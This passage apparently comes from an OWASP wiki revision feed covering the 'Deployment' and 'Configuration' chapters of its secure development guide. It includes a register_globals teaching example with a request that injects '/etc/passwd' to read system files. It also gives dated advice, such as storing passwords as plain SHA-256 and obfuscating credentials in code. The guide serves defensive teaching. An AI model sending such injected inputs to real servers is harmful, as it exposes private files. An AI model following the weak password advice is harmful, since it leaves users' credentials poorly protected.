advise that you need to buy the commercial version to be able to remove it. This situation will hopefully improve now that more antivirus and security software companies are building integrated solutions that detect spyware as well as viruses and worms. In the meantime, stick with the more well-known spyware detection software.&lt;br /&gt;
&lt;br /&gt;
Is it possible for an auditor to determine when this scan took place?&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
Do not create or distribute malicious software – it is illegal in most countries.&lt;br /&gt;
&lt;br /&gt;
Scan your final distribution images and media with at least one up to date virus scanner and at least one spyware checker. Document in your manual the date of this scan and the software used.&lt;br /&gt;
&lt;br /&gt;
==Further Reading ==&lt;br /&gt;
&lt;br /&gt;
===Deploying applications  ===&lt;br /&gt;
&lt;br /&gt;
* (PHP) Deploying PHP web applications with Ant:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.onlamp.com/pub/a/php/2005/12/20/php_ant.html&amp;lt;/u&amp;gt;  &lt;br /&gt;
&lt;br /&gt;
* (J2EE) Deploying for the web using Ant:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.onjava.com/pub/a/onjava/excerpt/AntTDG_chap8/index.html&amp;lt;/u&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.onjava.com/pub/a/onjava/excerpt/AntTDG_chap8/index1.html&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* (Apple MacOS X) Package Maker&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://developer.apple.com/tools/installerpolicy.html&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* (Many Linux distros) Redhat Package Manager (RPM)&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.rpm.org/&amp;lt;/u&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* (Fedora and Red Hat Enterprise Linux) Yellowdog Update Manager (YUM)&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://linux.duke.edu/projects/yum/&amp;lt;/u&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* (Debian, and MacOS X using Fink) Advanced Packaging Tool&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.debian.org/doc/manuals/apt-howto/index.en.html&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* (Solaris) Application Packaging Developer’s Guide&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://docs.sun.com/app/docs/doc/806-7008/&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* (Solaris) Blastwave is a project to encourage sharing of free software for Solaris 8, 9 and 10.  Also called Community Software for Solaris (CSW); the end-user uses the pkg-get tool to install packages.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.blastwave.org/&amp;lt;/u&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* (FreeBSD) Ports and Packages Collection &lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.freebsd.org/ports/index.html&amp;lt;/u&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* (Win32, .NET, any framework where xcopy works as a deployment tool)&lt;br /&gt;
&lt;br /&gt;
Microsoft Windows Installer XML (wix), a free Windows installer creator&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://sourceforge.net/projects/wix&amp;lt;/u&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Examples of bad deployment practices ===&lt;br /&gt;
&lt;br /&gt;
Sony’s root kit settlement will cost Sony more than $150 million and seriously set back their anti-consumer copy prohibition agenda&lt;br /&gt;
&lt;br /&gt;
* Sony, Rootkits and Digital Rights Management Gone Too Far:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.sysinternals.com/blog/2005/10/sony-rootkits-and-digital-rights.html&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* Sony has a voluntary recall program for XCP infected disks:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://cp.sonybmg.com/xcp/&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* Settlement details of at least ten class action lawsuits against Sony:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.eff.org/IP/DRM/Sony-BMG/&amp;lt;/u&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Microsoft distributes macro viruses on CD&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.f-secure.com/v-descs/wazzu.shtml&amp;lt;/u&amp;gt;   &lt;br /&gt;
&lt;br /&gt;
==Links==&lt;br /&gt;
[[Guide Table of Contents| Development Guide Table of Contents]]&lt;br /&gt;
[[Category:OWASP_Guide_Project]]&lt;br /&gt;
[[Category:Activity]]&lt;br /&gt;
[[Category:Deployment]]&lt;/div&gt;</summary>
		<author><name>KirstenS</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Deployment&amp;diff=60008</id>
		<title>Deployment</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Deployment&amp;diff=60008"/>
				<updated>2009-05-04T12:25:53Z</updated>
		
		<summary type="html">&lt;p&gt;KirstenS: /* Malicious software */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{{Template:Stub}}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Guide Table of Contents| Development Guide Table of Contents]]__TOC__&lt;br /&gt;
&lt;br /&gt;
Deployment is the first and sometimes the only experience system administrators will have with your application. Customers who buy or use your application appreciate the lower costs of securely deployed software – if their system administrators do not have to spend hours or days securing your software, they are far more likely to choose your software over an insecure competitor. &lt;br /&gt;
&lt;br /&gt;
Ease of deployment is a key consideration for many highly available or highly changeable systems. Systems have a special knack of buying the farm at 3 am Monday morning before the busiest day of the year. If your application can be trivially installed at 3 am by tired and emotional system administrators, they will remember you fondly when the time comes for new software or the next version. The worst case alternative is that your customers may not be around if your software takes three days to install. &lt;br /&gt;
&lt;br /&gt;
Secure deployment is essential for high value systems. High value systems require controls in excess of basic software. This chapter guides you through packaging and deployment issues.&lt;br /&gt;
&lt;br /&gt;
==Objective ==&lt;br /&gt;
&lt;br /&gt;
To ensure that the application is deployed as easily and as securely as possible.&lt;br /&gt;
&lt;br /&gt;
==Platforms Affected ==&lt;br /&gt;
&lt;br /&gt;
All.&lt;br /&gt;
&lt;br /&gt;
==Best Practices ==&lt;br /&gt;
&lt;br /&gt;
* Software should have automated installers and provide automated uninstallers&lt;br /&gt;
&lt;br /&gt;
* Software should deploy using a least privilege security model&lt;br /&gt;
&lt;br /&gt;
* Software should not expose any secrets once installed&lt;br /&gt;
&lt;br /&gt;
* Documentation should not contain any default accounts, nor should the installer contain any pre-chosen or default accounts&lt;br /&gt;
&lt;br /&gt;
* Every configuration parameter must to be findable&lt;br /&gt;
&lt;br /&gt;
==Release Management ==&lt;br /&gt;
&lt;br /&gt;
Release management is a formal process designed to ensure that applications are released in a tested and controlled fashion. &lt;br /&gt;
&lt;br /&gt;
===How to identify if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
Is there release management in place? If so, does it cover?&lt;br /&gt;
&lt;br /&gt;
* Deployment testing&lt;br /&gt;
&lt;br /&gt;
* Acceptance testing&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
* Read software quality assurance references &lt;br /&gt;
&lt;br /&gt;
* Write deployment instructions&lt;br /&gt;
&lt;br /&gt;
* Eliminate all steps that can be automated&lt;br /&gt;
&lt;br /&gt;
* Implement a deployment acceptance test&lt;br /&gt;
&lt;br /&gt;
==Secure delivery of code ==&lt;br /&gt;
&lt;br /&gt;
Attackers have been known to send malicious code to end users, so it is vital that your users and customers can obtain your software in a secure fashion. &lt;br /&gt;
&lt;br /&gt;
===How to identify if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
Secure delivery of code is relatively simple to test, and even easier to rectify. &lt;br /&gt;
&lt;br /&gt;
* Pretend to be a normal customer. Obtain your software in the usual fashion.&lt;br /&gt;
&lt;br /&gt;
* Was it obtained from a retailer or other distributor in hard format? If so, does the software contain instructions on how to validate it against legitimate deliveries?&lt;br /&gt;
&lt;br /&gt;
* Does the media contain any viruses or harmful code?&lt;br /&gt;
&lt;br /&gt;
* Was it obtained from a third party download site? If so, does it contain an accurate link back to your site?&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
Secure &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Code signing  ==&lt;br /&gt;
&lt;br /&gt;
===How to identify if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Permissions are set to least privilege ==&lt;br /&gt;
Application owner  must to use a different user than sys admin. Only sys admin have access to root password. &lt;br /&gt;
===How to identify if you are vulnerable ===&lt;br /&gt;
* every employee can access with root/admin user&lt;br /&gt;
*deployment procedures want system privileges&lt;br /&gt;
* live application want system privileges to start&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
* create one user for every application&lt;br /&gt;
* every application must uses least privileges&lt;br /&gt;
* deploy and start command does not use root/admin privileges&lt;br /&gt;
&lt;br /&gt;
==Automated packaging ==&lt;br /&gt;
&lt;br /&gt;
===How to identify if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Automated deployment ==&lt;br /&gt;
&lt;br /&gt;
===How to identify if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
==Automated removal ==&lt;br /&gt;
&lt;br /&gt;
===How to identify if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
==No backup or old files ==&lt;br /&gt;
&lt;br /&gt;
===How to identify if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
==Unnecessary features are off by default ==&lt;br /&gt;
&lt;br /&gt;
===How to identify if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Setup log files are clean ==&lt;br /&gt;
&lt;br /&gt;
===How to identify if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==No default accounts ==&lt;br /&gt;
&lt;br /&gt;
===How to identify if you are vulnerable ===&lt;br /&gt;
* Identify the default user accounts that are standard with the product you are using.&lt;br /&gt;
* Run periodic tests to ensure none of the accounts you identify are enabled or exist.&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
* Never generate common or default credentials.&lt;br /&gt;
* Always remove any default user accounts from the server and applications prior to deployment.&lt;br /&gt;
&lt;br /&gt;
==Easter eggs ==&lt;br /&gt;
&lt;br /&gt;
Easter eggs are mostly small (but sometimes not) hidden features. Often they will contain the developers' names or activate hidden advanced or developer features, but occasionally, they are more like mini-applications. For the most part, they have no business function.  &lt;br /&gt;
&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
''Figure 7 Adobe InDesign CS SVG Easter Egg''&lt;br /&gt;
&lt;br /&gt;
Easter eggs are fairly popular with developers, but they are problematic from a software engineering and legal view point. Unless easter eggs have been sufficiently designed and tested, easter eggs can cause the application to crash or misbehave. For example, Word 97 contained a pinball game and Excel 97 contained a small flight simulator. If these crashed with unsaved data, the application is not acting within design parameters, opening up liability. &lt;br /&gt;
&lt;br /&gt;
However, there is a case for including debug functionality, as long as it is tested, not enabled by default, and is documented within the user or administration manual. &lt;br /&gt;
&lt;br /&gt;
===How to identify if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
===It’s almost impossible to prevent clever  ===&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
==Malicious software ==&lt;br /&gt;
&lt;br /&gt;
The delivery of software is littered with examples of software delivered with something more than the users bargained for. &lt;br /&gt;
&lt;br /&gt;
Examples include:&lt;br /&gt;
&lt;br /&gt;
* Sony delivered First 4 Internet's XCP (Extended Copy Protection) rootkit on millions of audio disks, infecting at least half a million PCs. Major legal problems have ensued, and set copy prohibition technologies back at least five years&lt;br /&gt;
&lt;br /&gt;
* Microsoft through a lack of a quality assured distribution process (now resolved), distributed viruses on multiple occasions, such as the Word macro viruses Concept and Wazzu&lt;br /&gt;
&lt;br /&gt;
* Microsoft partner and premium support web sites were distributing Hotfixes with the FunLove virus in 2001&lt;br /&gt;
&lt;br /&gt;
* Hewlett-Packard had the FunLove virus on their web site, in 2000 and also 2006. Though in 2006 it was a printer that was no longer made and the Korean version of Windows 95 drivers for it, so not as big a deal as in 2000&lt;br /&gt;
&lt;br /&gt;
* Linux kernel with a backdoor was submitted to CVS tree in November 2003. It was spotted (by Larry McVoy) because it had been placed directly into CVS, not via  BitKeeper&lt;br /&gt;
&lt;br /&gt;
These examples show that distributing malicious software can be highly embarrassing, extremely expensive (in Sony’s case, hundreds of millions of dollars) to resolve, and they are often truly trivial to prevent. &lt;br /&gt;
&lt;br /&gt;
In the past, there has been a lot of confusion over the legal status of 'spyware' (e.g. software written so a boss can monitor his employees) and 'adware' (e.g. software written to collect and send back how many of a companies sites have been surfed to, or change keywords in search results). Often they have been distributed with free software, and the user has agreed in often vague and deliberately verbose legal agreements, that they can be installed on their system. Usually the adware is mentioned as a method to 'boost' the user's ability to use a shopping network, or it's mentioned that information might be sent back to 'assist in our marketing' or that of partners. This makes it sound as if it's akin to Web cookies, and that there'll be very little effect on system performance, and no privacy issues over what is sent back. However now that the public are becoming more aware of adware, the legal distinctions are clearer, and the IT security community are quickly learning which companies that write adware are prepared to play ball, make their warning notices more useful, make their software less covert, etc. and which are continuing to write software that violates the user's privacy and drains system resources.&lt;br /&gt;
&lt;br /&gt;
In most countries, it is now illegal to create, distribute, and use software that acts in a surreptitious and devious manner. Users will remember any vendor attempting such criminal sabotage and never buy from such vendors again. Sony is an excellent case of this; the rootkit scandal has done their reputation a great deal of damage. In Australia, such criminal acts are punishable with fines of up to $250,000 per infected computer, and up to 10 years imprisonment. Similar statutes and punishments exist in most countries. &lt;br /&gt;
&lt;br /&gt;
'''OWASP is not a source of legal advice; if you think your software flies close to the wind, you must seek competent legal opinion. Even better, do not create or distribute such software. Karma will bite you on the flip side. '''&lt;br /&gt;
&lt;br /&gt;
===How to identify if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
Does your software contain any malicious code, which performs unauthorized or damaging activity? This could be code like Sony’s root kit. If so remove it. &lt;br /&gt;
&lt;br /&gt;
Did you check your final software image for known:&lt;br /&gt;
&lt;br /&gt;
* viruses using at least one up to date virus scanner?&lt;br /&gt;
&lt;br /&gt;
* spyware using at least one up to date spyware scanner?&lt;br /&gt;
&lt;br /&gt;
You may also wish to check for rootkits as there are specific tools now available to do that, at least on the Windows and Unix platforms. &lt;br /&gt;
&lt;br /&gt;
Be aware that there are many free spyware scanners available which are not to be trusted. They may surreptitiously install spyware, then when they 'find' it,&lt;br /&gt;
advise that you need to buy the commercial version to be able to remove it. This situation will hopefully improve now that more antivirus and security software companies are building integrated solutions that detect spyware as well as viruses and worms. In the meantime, stick with the more well-known spyware detection software.&lt;br /&gt;
&lt;br /&gt;
Is it possible for an auditor to determine when this scan took place?&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
Do not create or distribute malicious software – it is illegal in most countries.&lt;br /&gt;
&lt;br /&gt;
Scan your final distribution images and media with at least one up to date virus scanner and at least one spyware checker. Document in your manual the date of this scan and the software used.&lt;br /&gt;
&lt;br /&gt;
==Further Reading ==&lt;br /&gt;
&lt;br /&gt;
===Deploying applications  ===&lt;br /&gt;
&lt;br /&gt;
* (PHP) Deploying PHP web applications with Ant:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.onlamp.com/pub/a/php/2005/12/20/php_ant.html&amp;lt;/u&amp;gt;  &lt;br /&gt;
&lt;br /&gt;
* (J2EE) Deploying for the web using Ant:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.onjava.com/pub/a/onjava/excerpt/AntTDG_chap8/index.html&amp;lt;/u&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.onjava.com/pub/a/onjava/excerpt/AntTDG_chap8/index1.html&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* (Apple MacOS X) Package Maker&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://developer.apple.com/tools/installerpolicy.html&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* (Many Linux distros) Redhat Package Manager (RPM)&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.rpm.org/&amp;lt;/u&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* (Fedora and Red Hat Enterprise Linux) Yellowdog Update Manager (YUM)&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://linux.duke.edu/projects/yum/&amp;lt;/u&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* (Debian, and MacOS X using Fink) Advanced Packaging Tool&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.debian.org/doc/manuals/apt-howto/index.en.html&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* (Solaris) Application Packaging Developer’s Guide&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://docs.sun.com/app/docs/doc/806-7008/&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* (Solaris) Blastwave is a project to encourage sharing of free software for Solaris 8, 9 and 10.  Also called Community Software for Solaris (CSW); the end-user uses the pkg-get tool to install packages.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.blastwave.org/&amp;lt;/u&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* (FreeBSD) Ports and Packages Collection &lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.freebsd.org/ports/index.html&amp;lt;/u&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* (Win32, .NET, any framework where xcopy works as a deployment tool)&lt;br /&gt;
&lt;br /&gt;
Microsoft Windows Installer XML (wix), a free Windows installer creator&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://sourceforge.net/projects/wix&amp;lt;/u&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Examples of bad deployment practices ===&lt;br /&gt;
&lt;br /&gt;
Sony’s root kit settlement will cost Sony more than $150 million and seriously set back their anti-consumer copy prohibition agenda&lt;br /&gt;
&lt;br /&gt;
* Sony, Rootkits and Digital Rights Management Gone Too Far:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.sysinternals.com/blog/2005/10/sony-rootkits-and-digital-rights.html&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* Sony has a voluntary recall program for XCP infected disks:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://cp.sonybmg.com/xcp/&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* Settlement details of at least ten class action lawsuits against Sony:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.eff.org/IP/DRM/Sony-BMG/&amp;lt;/u&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Microsoft distributes macro viruses on CD&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.f-secure.com/v-descs/wazzu.shtml&amp;lt;/u&amp;gt;   &lt;br /&gt;
&lt;br /&gt;
==Links==&lt;br /&gt;
[[Guide Table of Contents| Development Guide Table of Contents]]&lt;br /&gt;
[[Category:OWASP_Guide_Project]]&lt;br /&gt;
[[Category:Activity]]&lt;br /&gt;
[[Category:Deployment]]&lt;/div&gt;</summary>
		<author><name>KirstenS</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Configuration&amp;diff=59981</id>
		<title>Configuration</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Configuration&amp;diff=59981"/>
				<updated>2009-05-03T21:37:00Z</updated>
		
		<summary type="html">&lt;p&gt;KirstenS: /* How to protect yourself */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Guide Table of Contents|Development Guide Table of Contents]]__TOC__&lt;br /&gt;
&lt;br /&gt;
==Objective ==&lt;br /&gt;
&lt;br /&gt;
To produce applications which are secure out of the box.&lt;br /&gt;
&lt;br /&gt;
==Platforms Affected ==&lt;br /&gt;
&lt;br /&gt;
All.&lt;br /&gt;
&lt;br /&gt;
==Relevant COBIT Topics ==&lt;br /&gt;
&lt;br /&gt;
DS6 – Manage Changes – All sections should be reviewed&lt;br /&gt;
&lt;br /&gt;
==Best Practices ==&lt;br /&gt;
&lt;br /&gt;
Turn off all unnecessary features by default&lt;br /&gt;
&lt;br /&gt;
* Ensure that all switches and configuration for every feature is configured initially to be the safest possible choice.&lt;br /&gt;
&lt;br /&gt;
* Inspect the design to see if the less safe choices could be designed in another way. For example, password reset systems are intrinsically unsound from a security point of view. If you do not ship this component, your application’s users will be safer.&lt;br /&gt;
&lt;br /&gt;
* Do not rely on optionally installed features in the base code.&lt;br /&gt;
&lt;br /&gt;
* Do not configure anything in preparation for an optionally deployable feature.&lt;br /&gt;
&lt;br /&gt;
==Default passwords ==&lt;br /&gt;
&lt;br /&gt;
Applications often ship with well-known passwords. In a particularly excellent effort, NGS Software determined that Oracle’s “Unbreakable” database server contained 168 default passwords out of the box. Obviously, changing this many credentials every time an application server is deployed is out of the question, nor should it be necessary.&lt;br /&gt;
&lt;br /&gt;
===How to identify if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
* Inspect the application’s manifest and ensure that no passwords are included in any form, whether within the source files, compiled into the code, or as part of the configuration.&lt;br /&gt;
&lt;br /&gt;
* Inspect the application for usernames and passwords. Ensure that diagrams also do not have any.&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
* Do not ship the product with any configured accounts.&lt;br /&gt;
&lt;br /&gt;
* Do not hard code any backdoor accounts or special access mechanisms.&lt;br /&gt;
&lt;br /&gt;
==Secure connection strings ==&lt;br /&gt;
&lt;br /&gt;
Connection strings to the database are rarely encrypted. However, they allow a remote attacker who has shell access to perform direct operations against the database or back end systems, thus providing a leap point for total compromise. &lt;br /&gt;
&lt;br /&gt;
===How to identify if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
* Check your framework’s configuration file, registry settings, and any application based configuration file (usually config.php, etc) for clear text connection strings to the database.&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
* Sometimes, no password is just as good as a clear text password.&lt;br /&gt;
&lt;br /&gt;
* On the Win32 platform, use “TrustedConnection=yes”, and create the DSN with a stored credential. The credential is stored as an LSA Secret, which is not perfect, but is better than clear text passwords.&lt;br /&gt;
&lt;br /&gt;
* Develop a method to obfuscate the password in some form, such as “encrypting” the name using the hostname or similar within code in a non-obvious way.&lt;br /&gt;
&lt;br /&gt;
* Ask the database developer to provide a library which allows remote connections using a password hash instead of a clear text credential.&lt;br /&gt;
&lt;br /&gt;
==Secure network transmission ==&lt;br /&gt;
&lt;br /&gt;
By default, no unencrypted data should transit the network. &lt;br /&gt;
&lt;br /&gt;
===How to identify if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
* Use a packet capture tool, such as Ethereal, and mirror a switch port near the database or application servers.&lt;br /&gt;
&lt;br /&gt;
* Sniff the traffic for a while and determine your exposure to an attacker performing this exact same task.&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
* Use SSL, SSH and other forms of encryption (such as encrypted database connections) to prevent data from being intercepted or interfered with over the wire.&lt;br /&gt;
&lt;br /&gt;
==Encrypted data ==&lt;br /&gt;
&lt;br /&gt;
Some information security policies and standards require the database on-disk data to be encrypted. However, this is essentially useless if the database connection allows clear text access to the data. What is more important is the obfuscation and one-way encryption of sensitive data.&lt;br /&gt;
&lt;br /&gt;
===How to identify if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
Highly protected applications:&lt;br /&gt;
&lt;br /&gt;
* Is there a requirement to encrypt certain data?&lt;br /&gt;
&lt;br /&gt;
* If so, is it “encrypted” in such a fashion that allows a database administrator to read it without knowing the key?&lt;br /&gt;
&lt;br /&gt;
If so, the “encryption” is useless and another approach is required.&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
Highly protected applications and any application that has a requirement to encrypt data:&lt;br /&gt;
&lt;br /&gt;
* Passwords should only be stored in a non-reversible format, such as SHA-256 or similar&lt;br /&gt;
&lt;br /&gt;
* Sensitive data like credit cards should be carefully considered – do they have to be stored at all? '''The PCI guidelines are very strict''' '''on the storage of credit card data'''. '''We strongly recommend against it. '''&lt;br /&gt;
&lt;br /&gt;
* Encrypted data should not have the key on the database server. &lt;br /&gt;
&lt;br /&gt;
The last requirement requires the attacker to take control of two machines to bulk decrypt data. The encryption key should be able to be changed on a regular basis, and the algorithm should be sufficient to protect the data in a temporal timeframe. For example, there is no point in using 40 bit DES today; data should be encrypted using AES-128 or better.&lt;br /&gt;
&lt;br /&gt;
==PHP Configuration ==&lt;br /&gt;
&lt;br /&gt;
==Global variables  ==&lt;br /&gt;
&lt;br /&gt;
	Variables declared outside of functions are considered global by PHP. The opposite is that a variable declared inside a function, is considered to be in local function scope. PHP handles global variables quite differently than languages like C. In C, a global variable is always available in local scope as well as global, as long as it is not overridden by a local definition. In PHP things are different; to access a global variable from local scope you have to declare it global in that scope. The following example shows this:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
$sTitle = 'Page title'; // Global scope&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
function printTitle()&lt;br /&gt;
&lt;br /&gt;
{&lt;br /&gt;
&lt;br /&gt;
global $sTitle; // Declare the variable as global&lt;br /&gt;
&lt;br /&gt;
	echo $sTitle; // Now we can access it just like it was a local variable&lt;br /&gt;
&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
	All variables in PHP are represented by a dollar sign followed by the name of the variable. The names are case-sensitive and must start with a letter or underscore, followed by any number of letters, numbers, or underscores.&lt;br /&gt;
&lt;br /&gt;
==register_globals ==&lt;br /&gt;
&lt;br /&gt;
The register_globals directive makes input from GET, POST and COOKIE, as well as session variables and uploaded files, directly accessible as global variables in PHP. This single directive, if set in php.ini, is the root of many vulnerabilities in web applications. 	 &lt;br /&gt;
&lt;br /&gt;
Let's start by having a look at an example:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
if ($bIsAlwaysFalse) &lt;br /&gt;
&lt;br /&gt;
{ &lt;br /&gt;
&lt;br /&gt;
	// This is never executed:&lt;br /&gt;
&lt;br /&gt;
	$sFilename = 'somefile.php';&lt;br /&gt;
&lt;br /&gt;
}''&lt;br /&gt;
&lt;br /&gt;
//       ...&lt;br /&gt;
&lt;br /&gt;
if ( $sFilename != '' )   &lt;br /&gt;
&lt;br /&gt;
{&lt;br /&gt;
&lt;br /&gt;
	// Open $sFilename and send it's contents to the browser  &lt;br /&gt;
&lt;br /&gt;
	//		... &lt;br /&gt;
&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;/pre&amp;gt;  &lt;br /&gt;
&lt;br /&gt;
If we were to call this page like: '''''page.php?sFilename=/etc/passwd''''' with register_globals set, it would be the same as to write the following:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
$sFilename = '/etc/passwd'; // This is done internally by PHP       &lt;br /&gt;
&lt;br /&gt;
if ( $bIsAlwaysFalse )&lt;br /&gt;
&lt;br /&gt;
{       // This is never executed:         &lt;br /&gt;
&lt;br /&gt;
	$sFilename = 'somefile.php';&lt;br /&gt;
&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
// ...&lt;br /&gt;
&lt;br /&gt;
if ( $sFilename != '' )&lt;br /&gt;
&lt;br /&gt;
{&lt;br /&gt;
&lt;br /&gt;
	// Open $sFilename and send it's contents to the browser&lt;br /&gt;
&lt;br /&gt;
	// ...&lt;br /&gt;
&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
PHP takes care of the '''''$sFilename = '/etc/passwd';''''' part for us. What this means is that a malicious user could inject his/her own value for $sFilename and view any file readable under the current security context. &lt;br /&gt;
&lt;br /&gt;
We should always think of that “what if” when writing code. So turning off register_globals might be a solution but what if our code ends up on a server with register_globals on. We must bear in mind that all variables in global scope could have been tampered with. The correct way to write the above code would be to make sure that we always assign a value to '''''$sFilename''''': &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
